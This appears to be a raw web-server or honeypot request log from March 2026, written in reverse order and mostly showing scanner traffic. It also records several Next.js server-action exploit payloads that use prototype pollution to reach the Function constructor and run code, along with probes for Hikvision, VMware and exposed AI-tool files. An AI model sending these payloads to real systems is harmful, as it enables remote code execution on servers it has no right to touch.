User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:35408
Path: /api
URL: /api
Method: POST
[2026-03-04 07:04:35] === HTTP Request ===
===================
------WebKitFormBoundaryx2083569480225--
------WebKitFormBoundaryx2083569480225
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2083569480225
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 274166+true+7599664;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2083569480225
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2083569480225
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_2083569480225
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:35406
Path: /_next
URL: /_next
Method: POST
[2026-03-04 07:04:29] === HTTP Request ===
[2026-03-04 07:04:29] Main page accessed - IP: 195.3.221.86:35390
===================
------WebKitFormBoundaryx260604516685--
------WebKitFormBoundaryx260604516685
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx260604516685
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 180364+true+1444881;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx260604516685
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx260604516685
Accept-Encoding: gzip, deflate
Connection: close
Next-Action: x
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_260604516685
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:35390
Path: /
URL: /
Method: POST
[2026-03-04 07:04:29] === HTTP Request ===
[2026-03-04 07:04:26] Main page accessed - IP: 195.3.221.86:46502
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46502
Path: /
URL: /
Method: GET
[2026-03-04 07:04:26] === HTTP Request ===
[2026-03-04 05:06:01] Main page accessed - IP: 205.210.31.71:63142
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 205.210.31.71:63142
Path: /
URL: /
Method: GET
[2026-03-04 05:06:01] === HTTP Request ===
[2026-03-04 04:42:44] Main page accessed - IP: 195.3.221.86:33190
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:33190
Path: /
URL: /
Method: GET
[2026-03-04 04:42:44] === HTTP Request ===
[2026-03-04 04:19:02] Main page accessed - IP: 198.235.24.104:56961
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.104:56961
Path: /
URL: /
Method: GET
[2026-03-04 04:19:02] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:43092
Path: /jars
URL: /jars
Method: GET
[2026-03-04 01:59:46] === HTTP Request ===
[2026-03-04 01:58:34] Main page accessed - IP: 87.236.176.81:44933
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru:8081
RemoteAddr: 87.236.176.81:44933
Path: /
URL: /
Method: GET
[2026-03-04 01:58:34] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50009
Path: /.aider.chat.history.md
URL: /.aider.chat.history.md
Method: GET
[2026-03-04 01:26:05] === HTTP Request ===
[2026-03-04 01:16:21] Main page accessed - IP: 205.210.31.91:62248
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: media.vulnberries.ru
RemoteAddr: 205.210.31.91:62248
Path: /
URL: /
Method: GET
[2026-03-04 01:16:21] === HTTP Request ===
[2026-03-04 01:07:22] Main page accessed - IP: 198.235.24.240:59178
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: mail.anzan.tech
RemoteAddr: 198.235.24.240:59178
Path: /
URL: /
Method: GET
[2026-03-04 01:07:22] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:47292
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-04 00:26:27] === HTTP Request ===
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:47278
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-04 00:26:27] === HTTP Request ===
[2026-03-04 00:26:27] Main page accessed - IP: 64.227.18.98:47262
===================
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 64.227.18.98:47262
Path: /
URL: /
Method: GET
[2026-03-04 00:26:27] === HTTP Request ===
[2026-03-04 00:25:12] Main page accessed - IP: 146.190.69.241:49720
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 146.190.69.241:49720
Path: /
URL: /
Method: GET
[2026-03-04 00:25:12] === HTTP Request ===
[2026-03-04 00:14:28] Main page accessed - IP: 198.235.24.111:63534
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 198.235.24.111:63534
Path: /
URL: /
Method: GET
[2026-03-04 00:14:28] === HTTP Request ===
[2026-03-04 00:08:01] Main page accessed - IP: 147.185.132.120:62484
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 147.185.132.120:62484
Path: /
URL: /
Method: GET
[2026-03-04 00:08:01] === HTTP Request ===
===================
------WebKitFormBoundaryx530413513820--
------WebKitFormBoundaryx530413513820
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx530413513820
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 194339+true+2729321;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx530413513820
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx530413513820
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_530413513820
X-Nextjs-Request-Id: poop1234
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51036
Path: /api/route
URL: /api/route
Method: POST
[2026-03-04 00:01:04] === HTTP Request ===
===================
------WebKitFormBoundaryx348307908033--
------WebKitFormBoundaryx348307908033
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx348307908033
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 46426+true+7502432;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx348307908033
Next-Action: x
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx348307908033
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_348307908033
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51024
Path: /app
URL: /app
Method: POST
[2026-03-04 00:01:00] === HTTP Request ===
===================
------WebKitFormBoundaryx1568303734825--
------WebKitFormBoundaryx1568303734825
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1568303734825
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 295188+true+5312898;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1568303734825
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1568303734825
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Length: 522
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_1568303734825
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:51008
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-04 00:00:58] === HTTP Request ===
===================
------WebKitFormBoundaryx99322419725--
------WebKitFormBoundaryx99322419725
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx99322419725
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 67397+true+1473692;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx99322419725
X-Nextjs-Html-Request-Id: ilovepoop_99322419725
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx99322419725
Connection: close
Content-Length: 513
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:50980
Path: /api
URL: /api
Method: POST
[2026-03-04 00:00:57] === HTTP Request ===
===================
------WebKitFormBoundaryx211381790019--
------WebKitFormBoundaryx211381790019
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx211381790019
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 59102+true+3576559;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx211381790019
Connection: close
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_211381790019
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx211381790019
X-Nextjs-Request-Id: poop1234
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46292
Path: /_next
URL: /_next
Method: POST
[2026-03-04 00:00:54] === HTTP Request ===
[2026-03-04 00:00:51] Main page accessed - IP: 195.3.221.86:46290
===================
------WebKitFormBoundaryx241668489763--
------WebKitFormBoundaryx241668489763
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx241668489763
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 57342+true+4214511;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx241668489763
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_241668489763
Connection: close
Content-Length: 517
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx241668489763
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46290
Path: /
URL: /
Method: POST
[2026-03-04 00:00:51] === HTTP Request ===
[2026-03-04 00:00:51] Main page accessed - IP: 195.3.221.86:46270
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:46270
Path: /
URL: /
Method: GET
[2026-03-04 00:00:51] === HTTP Request ===
[2026-03-03 23:29:16] Main page accessed - IP: 205.210.31.209:58756
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 205.210.31.209:58756
Path: /
URL: /
Method: GET
[2026-03-03 23:29:16] === HTTP Request ===
[2026-03-03 23:10:22] Main page accessed - IP: 198.235.24.231:65512
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: warehouse.vulnberries.ru
RemoteAddr: 198.235.24.231:65512
Path: /
URL: /
Method: GET
[2026-03-03 23:10:22] === HTTP Request ===
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 198.235.24.177:61676
Path: /.well-known/security.txt
URL: /.well-known/security.txt
Method: GET
[2026-03-03 22:51:17] === HTTP Request ===
[2026-03-03 22:05:07] Main page accessed - IP: 198.235.24.197:58870
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 198.235.24.197:58870
Path: /
URL: /
Method: GET
[2026-03-03 22:05:07] === HTTP Request ===
[2026-03-03 21:31:53] Main page accessed - IP: 205.210.31.240:63692
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 205.210.31.240:63692
Path: /
URL: /
Method: GET
[2026-03-03 21:31:53] === HTTP Request ===
===================
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.96:47566
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-03 21:23:31] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50011
Path: /.cursorrules
URL: /.cursorrules
Method: GET
[2026-03-03 20:45:27] === HTTP Request ===
[2026-03-03 20:45:26] Main page accessed - IP: 147.185.132.69:61286
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: inventory.vulnberries.ru
RemoteAddr: 147.185.132.69:61286
Path: /
URL: /
Method: GET
[2026-03-03 20:45:26] === HTTP Request ===
[2026-03-03 18:32:07] Main page accessed - IP: 80.82.77.202:54492
===================
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 80.82.77.202:54492
Path: /
URL: /
Method: GET
[2026-03-03 18:32:07] === HTTP Request ===
[2026-03-03 18:21:28] Main page accessed - IP: 147.185.132.198:65020
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 147.185.132.198:65020
Path: /
URL: /
Method: GET
[2026-03-03 18:21:28] === HTTP Request ===
[2026-03-03 18:15:41] Main page accessed - IP: 207.90.244.21:43548
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.21:43548
Path: /
URL: /
Method: GET
[2026-03-03 18:15:41] === HTTP Request ===
[2026-03-03 16:33:35] Main page accessed - IP: 172.30.0.12:49484
===================
X-Forwarded-For: 138.197.124.41
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Microsoft Edge";v="101"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47
Sec-Ch-Ua-Mobile: ?0
Via: 2.0 Caddy
Sec-Fetch-Site: none
Sec-Ch-Ua-Platform: "Windows"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: navigate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49484
Path: /
URL: /
Method: GET
[2026-03-03 16:33:35] === HTTP Request ===
[2026-03-03 16:14:16] Main page accessed - IP: 172.30.0.12:40934
===================
Referer: http://admin.vulnberries.ru
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 136.113.96.93
Via: 2.0 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40934
Path: /
URL: /
Method: GET
[2026-03-03 16:14:16] === HTTP Request ===
[2026-03-03 16:09:56] Main page accessed - IP: 172.245.21.30:55310
===================
Upgrade-Insecure-Requests: 1
Connection: close
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Linux Gnu (cow)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 172.245.21.30:55310
Path: /
URL: /
Method: GET
[2026-03-03 16:09:56] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.134:39266
Path: /loginout.php/
URL: /loginout.php/
Method: GET
[2026-03-03 14:57:34] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Referer: http://95.143.191.38:8081/
Priority: u=0, i
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.232.157.204:55754
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-03 14:05:02] === HTTP Request ===
[2026-03-03 14:05:01] Main page accessed - IP: 165.232.157.204:55746
===================
Sec-Fetch-Mode: navigate
Connection: keep-alive
Priority: u=0, i
Sec-Fetch-User: ?1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.232.157.204:55746
Path: /
URL: /
Method: GET
[2026-03-03 14:05:01] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:39234
Path: /jars
URL: /jars
Method: GET
[2026-03-03 13:38:43] === HTTP Request ===
[2026-03-03 13:36:57] Main page accessed - IP: 35.205.205.250:40032
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 35.205.205.250:40032
Path: /
URL: /
Method: GET
[2026-03-03 13:36:57] === HTTP Request ===
[2026-03-03 12:34:53] Main page accessed - IP: 47.97.103.223:46914
===================
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.97.103.223:46914
Path: /
URL: /
Method: GET
[2026-03-03 12:34:53] === HTTP Request ===
[2026-03-03 12:34:52] Main page accessed - IP: 47.97.103.223:46832
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 47.97.103.223:46832
Path: /
URL: /
Method: GET
[2026-03-03 12:34:52] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.97.103.223:46722
Path: /evox/about
URL: /evox/about
Method: GET
[2026-03-03 12:34:51] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Length: 441
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.97.103.223:46566
Path: /sdk
URL: /sdk
Method: POST
[2026-03-03 12:34:50] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 47.97.103.223:46562
Path: /nmaplowercheck1772541290
URL: /nmaplowercheck1772541290
Method: GET
[2026-03-03 12:34:50] === HTTP Request ===
[2026-03-03 12:34:21] Main page accessed - IP: 47.97.103.223:45200
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 47.97.103.223:45200
Path: /
URL: /
Method: GET
[2026-03-03 12:34:21] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.124:34064
Path: /security.txt
URL: /security.txt
Method: GET
[2026-03-03 12:02:21] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.124:62588
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-03 12:02:06] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.124:62580
Path: *
URL: *
Method: PRI
[2026-03-03 12:02:06] === HTTP Request ===
[2026-03-03 12:02:05] Main page accessed - IP: 66.132.153.124:62564
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.124:62564
Path: /
URL: /
Method: GET
[2026-03-03 12:02:05] === HTTP Request ===
===================
Sec-Fetch-Dest: image
X-Forwarded-For: 178.120.10.109
Sec-Fetch-Mode: no-cors
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
Via: 2.0 Caddy
Priority: u=1, i
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37078
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-03 11:16:29] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Referer: https://admin.vulnberries.ru/login
Priority: u=1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
